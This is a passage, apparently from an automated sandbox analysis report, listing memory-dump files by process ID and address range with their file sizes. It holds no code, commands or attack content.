                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    2.7MB

                                                                                                                                                                                                                                  • memory/2848-524-0x000001A0A8690000-0x000001A0A894B000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    2.7MB

                                                                                                                                                                                                                                  • memory/2848-527-0x000001A0A8690000-0x000001A0A894B000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    2.7MB

                                                                                                                                                                                                                                  • memory/3092-271-0x0000000000710000-0x000000000073E000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    184KB

                                                                                                                                                                                                                                  • memory/3104-23-0x0000000004B70000-0x0000000004B71000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/3104-26-0x0000000004B90000-0x0000000004B91000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/3104-27-0x0000000004B80000-0x0000000004B81000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/3104-272-0x0000000000340000-0x00000000007ED000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                                                  • memory/3104-22-0x0000000004B30000-0x0000000004B31000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/3104-131-0x0000000000340000-0x00000000007ED000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                                                  • memory/3104-24-0x0000000004B10000-0x0000000004B11000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/3104-90-0x0000000000340000-0x00000000007ED000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                                                  • memory/3104-25-0x0000000004B20000-0x0000000004B21000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/3104-21-0x0000000004B50000-0x0000000004B51000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/3104-20-0x0000000004B40000-0x0000000004B41000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/3104-19-0x0000000000340000-0x00000000007ED000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                                                  • memory/3104-18-0x0000000000340000-0x00000000007ED000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                                                  • memory/3152-511-0x0000000000400000-0x0000000000408000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                                  • memory/3204-226-0x0000000000D00000-0x0000000000D52000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    328KB

                                                                                                                                                                                                                                  • memory/3204-225-0x0000000073450000-0x0000000073C00000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                  • memory/3204-244-0x0000000005730000-0x0000000005740000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                  • memory/4068-89-0x0000000003460000-0x0000000005460000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    32.0MB

                                                                                                                                                                                                                                  • memory/4068-241-0x0000000003460000-0x0000000005460000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    32.0MB

                                                                                                                                                                                                                                  • memory/4068-79-0x0000000073450000-0x0000000073C00000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                  • memory/4068-78-0x0000000000E30000-0x0000000000FEC000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    1.7MB

                                                                                                                                                                                                                                  • memory/4068-80-0x0000000005840000-0x0000000005850000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                  • memory/4068-88-0x0000000073450000-0x0000000073C00000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                  • memory/4616-4-0x0000000004AE0000-0x0000000004AE1000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4616-10-0x0000000004B20000-0x0000000004B21000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4616-8-0x0000000004AB0000-0x0000000004AB1000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4616-6-0x0000000004B00000-0x0000000004B01000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4616-1-0x0000000077844000-0x0000000077846000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                  • memory/4616-0-0x0000000000110000-0x00000000005BD000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                                                  • memory/4616-3-0x0000000004AD0000-0x0000000004AD1000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4616-2-0x0000000000110000-0x00000000005BD000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                                                  • memory/4616-7-0x0000000004AA0000-0x0000000004AA1000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4616-9-0x0000000004B30000-0x0000000004B31000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4616-5-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/4616-15-0x0000000000110000-0x00000000005BD000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                                                  • memory/4912-83-0x0000000000400000-0x0000000000592000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    1.6MB

                                                                                                                                                                                                                                  • memory/4912-92-0x00000000057D0000-0x00000000057E0000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                  • memory/4912-91-0x0000000073450000-0x0000000073C00000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                  • memory/5204-132-0x00000000051C0000-0x00000000051D0000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                  • memory/5204-130-0x0000000004F70000-0x0000000005002000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    584KB

                                                                                                                                                                                                                                  • memory/5204-193-0x0000000006700000-0x000000000673C000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    240KB

                                                                                                                                                                                                                                  • memory/5204-174-0x00000000066A0000-0x00000000066B2000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    72KB

                                                                                                                                                                                                                                  • memory/5204-161-0x0000000006C10000-0x0000000007228000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    6.1MB

                                                                                                                                                                                                                                  • memory/5204-156-0x0000000006390000-0x00000000063AE000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    120KB

                                                                                                                                                                                                                                  • memory/5204-154-0x0000000005BB0000-0x0000000005C26000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    472KB

                                                                                                                                                                                                                                  • memory/5204-122-0x0000000000630000-0x0000000000682000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    328KB

                                                                                                                                                                                                                                  • memory/5204-121-0x0000000073450000-0x0000000073C00000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                  • memory/5204-127-0x0000000005480000-0x0000000005A24000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    5.6MB

                                                                                                                                                                                                                                  • memory/5204-198-0x0000000006870000-0x00000000068BC000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                  • memory/5204-173-0x0000000006760000-0x000000000686A000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                                                  • memory/5204-133-0x0000000004F60000-0x0000000004F6A000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    40KB

                                                                                                                                                                                                                                  • memory/5772-58-0x0000000073450000-0x0000000073C00000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                  • memory/5772-55-0x00000000024C0000-0x00000000044C0000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    32.0MB

                                                                                                                                                                                                                                  • memory/5772-48-0x0000000073450000-0x0000000073C00000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                  • memory/5772-47-0x0000000000010000-0x0000000000062000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    328KB

                                                                                                                                                                                                                                  • memory/5780-306-0x0000000000400000-0x0000000000413000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    76KB